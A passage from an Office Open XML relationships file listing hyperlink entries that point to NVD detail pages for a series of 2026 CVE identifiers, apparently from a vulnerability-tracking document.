Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53933" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62652" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81531" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81823" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86810" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74859" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72927" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52486" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17509" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18021" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53637" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55256" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62437" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67624" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67629" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67630" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69562" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76000" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77896" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId1127" /><Relationship 